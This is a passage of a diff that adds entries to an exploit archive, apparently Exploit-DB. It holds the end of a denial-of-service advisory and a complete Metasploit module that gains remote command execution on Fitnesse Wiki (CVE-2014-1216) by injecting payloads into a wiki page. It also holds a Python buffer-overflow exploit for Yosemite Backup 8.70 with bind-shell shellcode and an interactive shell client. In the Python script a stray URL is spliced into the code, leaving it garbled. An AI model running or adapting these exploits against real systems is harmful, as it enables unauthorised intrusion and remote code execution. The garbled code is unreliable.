+Attackers may exploit this issue to deny further service to legitimate users.
+
+This issue affects Windows 2003 and Windows Vista; other versions may also be affected. 
+
+http://www.exploit-db.com/sploits/32573.zip
--- a/platforms/windows/remote/32568.rb
+++ b/platforms/windows/remote/32568.rb
@ -0,0 +1,172 @@
+##
+# This module requires Metasploit: http//metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+
+class Metasploit3 < Msf::Exploit::Remote
+  Rank = GoodRanking
+
+  include Msf::Exploit::Remote::HttpClient
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'           => 'Fitnesse Wiki Remote Command Execution',
+      'Description'    => %q{
+        This module exploits a vulnerability found in Fitnesse Wiki, version 20140201
+        and earlier.
+      },
+      'Author'         =>
+        [
+          'Jerzy Kramarz',  ## Vulnerability discovery
+          'Veerendra G.G <veerendragg {at} secpod.com>', ## Metasploit Module
+        ],
+      'License'        => MSF_LICENSE,
+      'References'     =>
+        [
+          [ 'CVE', '2014-1216' ],
+          [ 'OSVDB', '103907' ],
+          [ 'BID', '65921' ],
+          [ 'URL', 'http://secpod.org/blog/?p=2311' ],
+          [ 'URL', 'http://secpod.org/msf/fitnesse_wiki_rce.rb' ],
+          [ 'URL', 'http://seclists.org/fulldisclosure/2014/Mar/1' ],
+          [ 'URL', 'https://www.portcullis-security.com/security-research-and-downloads/security-advisories/cve-2014-1216/' ]
+        ],
+
+      'Privileged'     => false,
+      'Payload'        =>
+        {
+          'Space'    => 1000,
+          'BadChars' => "",
+          'DisableNops' => true,
+          'Compat'      =>
+            {
+              'PayloadType' => 'cmd', ##
+              ##'RequiredCmd'  => 'generic telnet',
+              ## payloads cmd/windows/adduser and cmd/windows/generic works perfectly
+            }
+        },
+      'Platform'       => %w{ win },
+      'Arch'           => ARCH_CMD,
+      'Targets'        =>
+        [
+          ['Windows', { 'Platform' => 'win' } ],
+        ],
+      'DefaultTarget'  => 0,
+      'DisclosureDate' => 'Feb 25 2014'))
+
+    register_options(
+      [
+        Opt::RPORT(80),
+        OptString.new('TARGETURI', [true, 'Fitnesse Wiki base path', '/'])
+      ], self.class)
+  end
+
+  def check
+    print_status("#{peer} - Trying to detect Fitnesse Wiki")
+    res = send_request_cgi({
+      'method' => 'GET',
+      'uri'    => normalize_uri(target_uri.path)
+    })
+
+    if res && res.code == 200 && res.body.include?(">FitNesse<")
+      print_good("#{peer} - FitNesse Wiki Detected!")
+      return Exploit::CheckCode::Detected
+    end
+
+    return Exploit::CheckCode::Safe
+  end
+
+  def http_send_command(command)
+
+    ## Construct random page in WikiWord format
+    uri = normalize_uri(target_uri.path, 'TestP' + rand_text_alpha_lower(7))
+    res = send_request_cgi({
+      'method' => 'GET',
+      'uri'    => uri + "?edit"
+    })
+
+    if !res || res.code != 200
+      fail_with(Failure::Unknown, "#{peer} - Unexpected response, exploit probably failed!")
+    end
+
+    print_status("#{peer} - Retrieving edit time and ticket id")
+
+    ## Get Edit Time and Ticket Id from the response
+    res.body =~ /"editTime" value="((\d)+)"/
+    edit_time = $1
+
+    res.body =~ /"ticketId" value="((-?\d)+)"/
+    ticket_id = $1
+
+    ## Validate we are able to extract Edit Time and Ticket Id
+    if !edit_time or !ticket_id
+      print_error("#{peer} - Failed to get Ticket Id / Edit Time.")
+      return
+    end
+
+    print_status("#{peer} - Attempting to create '#{uri}'")
+
+    ## Construct Referer
+    referer = "http://#{rhost}:#{rport}" + uri + "?edit"
+
+    ## Construct command to be executed
+    page_content = '!define COMMAND_PATTERN {%m}
+!define TEST_RUNNER {' + command + '}'
+
+    print_status("#{peer} - Injecting the payload")
+    ## Construct POST request to create page with malicious commands
+    ## inserted in the page
+    res = send_request_cgi(
+    {
+      'uri'     => uri,
+      'method'  => 'POST',
+      'headers' => {'Referer' => referer},
+      'vars_post' =>
+        {
+          'editTime' => edit_time,
+          'ticketId' => ticket_id,
+          'responder' => 'saveData',
+          'helpText' => '',
+          'suites' => '',
+          '__EDITOR__1' => 'textarea',
+          'pageContent' => page_content,
+          'save' => 'Save',
+        }
+    })
+
+    if res && res.code == 303
+      print_status("#{peer} - Successfully created '#{uri}' with payload")
+    end
+
+    ## Execute inserted command
+    print_status("#{peer} - Sending exploit request")
+    res = send_request_cgi({
+      'method' => 'GET',
+      'uri'    => uri + "?test"
+    })
+
+    if res && res.code == 200
+      print_status("#{peer} - Successfully sent exploit request")
+    end
+
+    ## Cleanup by deleting the created page
+    print_status("#{peer} - Execting cleanup routine")
+    referer = "http://#{rhost}:#{rport}" + uri + "?deletePage"
+    res = send_request_cgi(
+    {
+      'uri'     => uri + "?deletePage",
+      'method'  => 'POST',
+      'headers' => {'Referer' => referer},
+      'vars_post' =>
+        {
+          'confirmed' => 'Yes',
+        }
+    })
+  end
+
+  def exploit
+    http_send_command(payload.encoded)
+  end
+end
--- a/platforms/windows/remote/32578.py
+++ b/platforms/windows/remote/32578.py
@ -0,0 +1,161 @@
+source: http://www.securityfocus.com/bid/32246/info
+
+Yosemite Backup is prone to a buffer-overflow vulnerability because it fails to adequately bounds-check user-supplied data before copying it to an insufficiently sized buffer.
+
+Attackers can exploit this issue to execute arbitrary code within the context of the affected application or cause a denial-of-service condition.
+
+NOTE: Reports indicate that successful exploits allow remote code execution on Linux systems and denial of service on Windows systems.
+
+Yosemite Backup 8.70 is vulnerable; other versions may also be affected. 
+
+import os
+import sys
+import socket
+# http://www.insight-tech.org
+# http://www.insight-tech.org/xploits/yosemiteStackOverflowExploit.zip
+#Yosemite backup 8.7 PoC by AbdulAziz Hariri.
+#BIND TO PORT 4444 - Metasploit
+shellcode=("\x29\xc9\x83\xe9\xeb\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x90"
+"\x9f\xfa\x9d\x83\xeb\xfc\xe2\xf4\xa1\x44\xa9\xde\xc3\xf5\xf8\xf7"
+"\xf6\xc7\x63\x14\x71\x52\x7a\x0b\xd3\xcd\x9c\xf5\x81\xc3\x9c\xce"
+"\x19\x7e\x90\xfb\xc8\xcf\xab\xcb\x19\x7e\x37\x1d\x20\xf9\x2b\x7e"
+"\x5d\x1f\xa8\xcf\xc6\xdc\x73\x7c\x20\xf9\x37\x1d\x03\xf5\xf8\xc4"
+"\x20\xa0\x37\x1d\xd9\xe6\x03\x2d\x9b\xcd\x92\xb2\xbf\xec\x92\xf5"
+"\xbf\xfd\x93\xf3\x19\x7c\xa8\xce\x19\x7e\x37\x1d")
+
+request1_1 =("\x54\x84\x00\x00\x00\x00\x00\x00\x06\x00\x00\x00\x92\x00\x00\x00"+
+"\x03\x3f\xfb\x76\x08\x20\x80\x00\x7f\xe3\x08\x88\x57\x3b\x77\x80"+
+"\x01\x00\x00\x00\xc0\xa8\x01\x42\x00\x00\x00\x00\x00\x00\x00\x00"+
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"+
+"\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"+
+"\x00\x00\x00\x00\x30\x58\x39\x30\x00\x63\x88\x77\xfe\xff\xff\xff"+
+"\x1b\x3f\xfb\x76\x6a\x31\x41\x73\xb0\x03\x00\x00\xff\xff\x00\x00"+
+"\x06\x10\x00\x44\x74\x62\x3a\x20\x43\x6f\x6e\x74\x65\x78\x74\x00\xd8\xc1\x08\x10\xb0\x03\x00\x00\xff\xff\x00\x00\x06\x10\x00\x00"+
+"\x80\xfa")
+
+Request2_1=("\x51\x84\x00\x00\x02\x02\x02\x32\x18\x00\x00\x00\xa4\x01\x00\x00"+
+"\x00\x00\x00\x00")
+
+Request2_2=("\x00\x00\x00\x00\x00\x00\x00"+
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"+
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"+
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"+
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"+
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"+
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"+
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"+
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"+
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"+
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"+
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"+
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"+
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"+
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"+
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"+
+"\x00\x00\x00\x00\x4d\x4c\x4d\x4c\x4d\x44\x4f\x4c\x4f\x44\x4f\x44"+
+"\x49\x4c\x49\x44\x49\x4c\x43\x4c\x00\x00\x00\x00\x00\x00\x00\x00"+
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"+
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"+
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"+
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"+
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"+
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"+
+"\x00\x00\x00\x00\x01\x10\x00\x00\x1f\x93\xf0\x48\x67\x60\x1e\x00"+
+"\xd1\xc4\x4f\x00")
+
+def connectToTarget(hostname,port):
+    newsock = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
+    try:
+        newsock.connect((hostname,port))
+    except socket.error, (value,msg):
+        if newsock:
+          newsock.close()
+        print "[x] Error: %s.\n" % msg
+        sys.exit(1)http://www.insight-tech.org/xploits/yosemiteStackOverflowExploit.zip
+    else:
+        print "[x] 0wn3d!"
+    buff = ""
+    comm = ""
+    #newsock.send("\n\n")
+    bol = 1
+    while bol:
+        buff = ""
+        comm = ""
+        comm = raw_input("$ ")
+        if comm == 'Q':
+            bol = 0
+        elif comm == '':
+            comm = ""
+        else:
+            newsock.send(comm+"\n")
+            buff = newsock.recv(20024)
+            print buff
+
+if len(sys.argv) != 3:
+    print "[x] Usage: IP OS\n[x] OS: W/L\n"
+    sys.exit
+    
+hostname = sys.argv[1]
+osver = sys.argv[2]
+
+exploitType = 0
+
+if osver == 'W':
+    exploitType=0
+elif osver=='L':
+    exploitType=1
+else:
+    print "[x] OS not supported.\n"
+    sys.exit
+
+#CALL EDI - 0xB7DA6C90 - Slackware 12.0
+ret = "\x90\x6C\xDA\xB7"
+#WEEEEEEEEEEEEE - 0x0809c514 - Slackware 12.0
+edi = "\x14\xc5\x09\x08"
+
+if(exploitType == 1):
+    buff3r = ("\x90"*77) + shellcode + ("\x90"*119) + edi + ret
+else:
+    buff3r = "A"*500
+
+logno = Request2_1 + buff3r + Request2_2
+
+s = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
+try:
+   s.connect((hostname,3817))
+except socket.error, (value,msg):
+   if s:
+    s.close()
+   print "[x] Error: %s.\n" % msg
+   sys.exit(1)
+else:
+    print "[x] Connected to: %s." % hostname
+
+    print "[x] Sending initial request.."
+try:
+    s.send(request1_1)
+except socket.error, (value,msg):
+    if s:
+         s.close()
+    print "[x] Error: %s.\n" % msg
+    sys.exit(1)
+else:
+    print "[x] Sent!"
+
+print "[x] Sending Evil Buffer.."
+
+try:
+    s.send(logno)
+except socket.error, (value,msg):
+    if s:
+        s.close()
+    print "[x] Error: %s.\n" % msg
+    sys.exit(1)
+else:
+    print "[x] Sent!"
+
+if exploitType==1:
+    print "[x] Checking if exploit worked.."
+    connectToTarget(hostname,4444)
+
+print "[x] End of Demo exploit."